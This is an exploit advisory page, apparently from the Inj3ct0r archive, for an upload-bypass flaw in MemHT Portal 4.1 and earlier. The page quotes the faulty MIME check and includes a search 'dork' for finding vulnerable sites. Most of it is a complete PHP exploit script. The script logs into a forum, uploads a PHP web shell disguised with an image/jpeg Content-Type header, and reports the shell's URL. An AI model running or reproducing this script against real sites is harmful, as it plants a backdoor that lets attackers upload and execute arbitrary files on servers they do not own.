MemHT Portal <= 4.1 Upload ByPass Vulnerabilities
Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MemHT Portal <= 4.1 Upload ByPass Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================= MemHT Portal <= 4.1 Upload ByPass Vulnerabilities ================================================= +-------------------------------------------------------------------------------------------------------------------------------+ | _______ __ ______ | | | | |.--.--.| |--..-----. | |.----..-----..--.--.--. | | | || | || < | -__| | ---|| _|| -__|| | | | | | |__|____||_____||__|__||_____| |______||__| |_____||________| | +-------------------------------------------------------------------------------------------------------------------------------+ | Name: MemHT Portal <= 4.1 Upload ByPass | | Software: MemHT Portal <= 4.1 | | Site: http://www.memht.com | | Download: http://www.memht.com/index.php?page=release&download=full | | Vulnerability: Upload ByPass | | Severity: high ( low / medium / high ) | | Tested on: 4.1 | | Dork: "MemHT Portal" | +-------------------------------------------------------------------------------------------------------------------------------+ | Author: Lord-Anubis | | Contact: lord.anu bis4[at]gm ail[dot]com | | Date: 16.06.2010 ( dd.mm.yyyy ) | | Site: http://lordanubis.altervista.org/ | +-------------------------------------------------------------------------------------------------------------------------------+ | Bug File: inc/class/uploadFile.class.php | | 217. function checkMime() { | | 218. if (sizeof($this->mime) AND !@in_array($this->FILES[$this->field]['type'],$this->mime)) { | | 219. $this->error = _ERROR_FILENOTPERMITTED_; | | 220. } | | 221. } | +-------------------------------------------------------------------------------------------------------------------------------+ | Bug Explanation: | | - EN: In the file inc/class/uploadFile.class.php the control on the file's type uploaded, happens checking if the | | "Content-Type" sended between the header is on the array $this->mime. Therefore it's possible execute the | | upload of a PHP file,simply sending the header "Content-Type: image/jpeg ". | | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | | - ITA: Nel file inc/class/uploadFile.class.php il controllo sul tipo di file caricato avviene verificando se il | | "Content-Type" inviato tramite header è presente nell'array $this->mime. E' quindi possibile effettuare | | l'upload di un file PHP inviando, semplicemente, l'header "Content-Type: image/jpeg ". | | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | | - PL: W pliku inc/class/uploadFile.class.php kontrol nad typem wniesionego file przeprowadza sie sprawdzajac | | "Content-Type" przeslany przez header znajduje sie w array $this->mime. Jest mozliwe przeprowadzic upload file | | PHP, wprowadzajac po prostu header "Content-Type: image/jpeg ". | +-------------------------------------------------------------------------------------------------------------------------------+ | Exploit: | +-------------------------------------------------------------------------------------------------------------------------------+ <?php /** * exploit.php * * Software: MemHT Portal <= 4.1 * Author: Lord-Anubis <lord.anu bis4[at]gm ail[dot]com> * Vulnerability: Upload ByPass */ // error_reporting(0); ini_set("max_execution_time", 0); ini_set("default_socket_timeout", 5); // function sendPacket($packet) { global $hostName; if (!$sock = fsockopen(gethostbyname($hostName), 80)) { exit("[-] No response from '{$hostName}' "); } fputs($sock, $packet); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } // function randomNum() { for ($i = 0; $i < 15; $i++) { $rand .= rand(0, 9); } return $rand; } // function phpCode() { return "<form method="post" action="<?php echo "?$_SERVER[QUERY_STRING]"; ?>" enctype="multipart/form-data"><input type="file" name="upload" /><input type="submit" name="submit" value="submit" /></form>". "<?php error_reporting(0); set_time_limit(0); $link = dirname(__FILE__) . DIRECTORY_SEPARATOR . $_FILES['upload']['name'];". "if (move_uploaded_file($_FILES['upload']['tmp_name'], $link)) { echo $link; chmod($link, 0666); } else { echo "Error uploading. ( by Lord-Anubis )"; } ?>"; } // if ($argc != 5) { exit( "[+] Software: MemHT Portal <= 4.1 ". "[+] Author: Lord-Anubis ". "[+] Vulnerability: Upload ByPass ". "[+] Usage: ./exploit [hostName] [path] [userName] [passWord] ". "[+] Example: ". "[+] ./exploit 127.0.0.1 / anubis password ". "[+] ./exploit hostname.com /wowbb/ mark s3cret " ); } // list($cli, $hostName, $path, $userName, $passWord) = $argv; // if (substr($path, 0, 1) != "/") { $path = "/$path"; } if (substr($path, -1) != "/") { $path = "$path/"; } // $postData = "post_username={$userName}&post_password={$passWord}&Submit=Login&login=true"; $packet = "POST http://{$hostName}{$path}index.php?page=users HTTP/1.1 "; $packet .= "Content-Type: application/x-www-form-urlencoded "; $packet .= "Host: {$hostName} "; $packet .= "Content-Length: ".strlen($postData)." "; $packet .= "Referer: http://{$hostName}{$path} "; $packet .= $postData; $return = sendPacket($packet); // preg_match('/login\_user=(.*?);/is', $return, $return1); preg_match('/PHPSESSID=(.*?);/is', $return, $return2); $cookie = $return1[1]; $session = $return2[1]; // if ($cookie == 'deleted') { echo("[-] UserName or Password is invalid "); echo("[-] Exploit failed "); exit; } // for (;;) { if (empty($fid)) { $fid = 1; } if ($fid > 100) { echo("[-] Forum is disbled "); echo("[-] Exploit failed "); exit; } if (preg_match('/class='forum_legend'/is', file_get_contents("http://{$hostName}{$path}index.php?page=forum&op=viewForum&id={$fid}"))) { break; } $fid = $fid + 1; } // $boundary = randomNum(); $fileName = randomNum(); // $postArray = array( "name" => "Hello Wolrd!!!", "text" => "My name is Mark, i'm from 23 years old and i'm from US.", "tags" => "", "attachment" => phpCode(), "smiles" => "1", "notification" => "0", "Send" => "Send", "ok" => "true", ); // $postData = ""; foreach ($postArray as $key => $value) { $postData .= "-----------------------------{$boundary} "; $postData .= "Content-Disposition: form-data; name="{$key}"".($key === 'attachment' ? "; filename="{$fileName}.php"" : "")." "; $postData .= ($key === 'attachment' ? "Content-Type: image/jpeg " : ""); $postData .= " "; $postData .= "{$value} "; } // $postData .= "-----------------------------{$boundary}-- "; $packet = "POST http://{$hostName}{$path}index.php?page=forum&op=newThread&id={$fid} HTTP/1.1 "; $packet .= "Accept: image/gif, image/pjpeg, image/jpeg, image/png, image/tiff, image/bmp */* "; $packet .= "Referer: http://{$hostName}{$path} "; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------{$boundary} "; $packet .= "Host: {$hostName} "; $packet .= "Content-Length: ".strlen($postData)." "; $packet .= "Cookie: PHPSESSID={$session}; login_user={$cookie}; "; $packet .= "Connection: Close "; $packet .= $postData; sendPacket($packet); // if (!preg_match('/Lord-Anubis/is', file_get_contents("http://{$hostName}{$path}pages/forum/attachment/{$fileName}.php"))) { echo("[-] Attachment not found "); echo("[-] Exploit failed "); exit; } // echo("[+] http://{$hostName}{$path}pages/forum/attachment/{$fileName}.php "); echo("[+] Exploit successfull "); exit; ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
